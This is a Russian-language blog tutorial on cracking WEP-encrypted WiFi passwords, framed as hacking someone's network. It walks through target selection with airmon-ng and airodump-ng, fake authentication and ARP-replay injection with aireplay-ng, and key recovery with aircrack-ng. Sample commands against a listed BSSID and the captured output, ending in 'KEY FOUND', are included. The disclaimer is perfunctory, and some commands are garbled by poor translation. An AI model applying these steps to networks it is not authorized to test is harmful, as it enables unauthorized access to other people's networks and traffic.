Как взломать пароль WIFI быстро и легко

Как взломать пароль wifi

Требования: 

  • Linux CMD знания.
  • Kali Linux или Backtrack или Ubuntu 7.10 и выше
  • Aircrack ng (В Kali Linux он есть)
  • Понимание

 

Информация, содержащаяся в данном руководстве для образовательных и информационных целей, используйте её на свой страх и риск. Мы не несем никакой ответственность за ваши действия.

Шифрование WEP был признан одним из наименее защищенных методов обеспечения безопасности беспроводной точки доступа в истории WiFi. Основной причиной этого является то, что фрагменты ключа посылаются между клиентским компьютером и точкой доступа в 32-битных векторов инициализации. Статистически было показано, что у многих из них слабое шифрование и они уязвимы для анализа пакетов. Количество пакетов, необходимых для взлома ключа варьироваться от 200 до 500 тысяч за 64 и 128-битного шифрования соответственно.

*** ВСЕ КОМАНДЫ, перечисленные в этом уроке запускаются из корневой учетной записи(root)  на машине, если вы не используете Kali Linux или вы построили свою собственную систему, Вам необходимо войти в систему как Root или пишите Sudo при каждой команде ***

Первый шаг любого взломщика в точке доступа Wi-Fi, это выбрать цель. Это будет достигнуто путем запуска airmon-ng, чтобы перечислить все доступные сетевые адаптеры.

Пишем в терминале airmon-ng.
Interface       Chipset         Driver
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

 

Введите:

 Airodump-ng start (имя адаптера: ath0, wlan0 WLAN1, или какой у вас

Что это делает? Поставит ваш беспроводной адаптер в неразборчивый или монитор режим, который позволит ему принимать весь трафик, и в основном захватить ARP пакеты. Он также позволяет адаптеру впрыскивать пакет в сети, чтобы получить ответ от точки доступа(от Wifi цели).
Напишите команду

Airodump-ng и (имя адаптера: mon0, MON1, eth0)

это будет список всех доступных точек доступа и позволяет выбрать одну.

Вы хотите выбрать один с лучшем сигналом. Способ проверить лучший сигнал, это посмотреть на колонке PWR в то время как программа работает. Сильный сигнал будет низкое число после дефиса (-), такие как -56 или -86. Первый пример будет более сильный, как я считаю.
Мощность измеряется в -dBm или коэффициент мощности в децибелах (дБ) измеренной мощности, отнесенная к одной миливат. Меньшее число более сильный сигнал.

CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 
                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           
                                                                                                            
 BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782

После того как вы выбрали цель, запишите BSSID, канал, и объем данных, которые вы приняли. Еще один хороший показатель какую цели взломать. Это иметь разумное количество полученных данных (80-120 без инъекций, может быть и больше).
Запустите команду Airodump-ng -w filename(имя файла) —channel (канал от требуемого) —bssid (ESSID или MAC адрес цели) (интерфейс для захвата на, mon0, eth0).

Помните airmon дает вам в качестве интерфейсного режима контроля, как правило, mon0)

Пример:

airodump-ng -w output --channel 9 --bssid 00:14:6C:7E:40:80 ath0

Откройте отдельную консоль и напишите

 aireplay-NG -1 0 -a (ESSID цели) (интерфейс)

это фальшивый запрос на аутентификацию и даст вам что-то вроде этого:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful

После того как вы добились успешного результата, то запустите инъекции, чтобы собрать данные.
Чтобы увидеть атаку мы будем запускать эту команду в новом терминале:

aireplay-ng -3 -b (bssid цели) (интерфейс)

Эта команда запускает запрос воспроизведения атаки ARP, который будет стимулировать сбор данных.Это то что вам нужно, чтобы взломать точку доступа Wifi.

Пример:

aireplay-ng -3 -b 00:14:6C:7E:40:80 ath0

Должны увидеть:

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

Откройте еще одно окно консоли, третье, и введите

 Aircrack-ng filename.cap

И aircrack будет пытаться крякнуть то, что вы захватили, а если не удастся, она будет отслеживать количество данных которые вам прислали и продолжать пытаться взломать ключ. Когда кряк удался вы увидите на экране это:

Aircrack-ng
[00:03:06] Tested 674449 keys (got 96610 IVs)
 KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) 
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) 
  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) 
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) 
   KEY FOUND! [ 12:34:56:78:90 ] 
      Probability: 100%

Этот экран позволит вам знать, что вы успешно взломали ключ, и вы можете скопировать его до использования или теста. Вы можете скопировать .cap файл на флэш-накопитель и потом крякнуть опять. А если вы потеряете ключ возможно придется взломать его снова.

Это все, что действительно нужно знать, чтобы взломать Wifi с шифровкой WEP.

3 комментария

Оставить ответ

Ваш адрес email не будет опубликован. Обязательные поля помечены *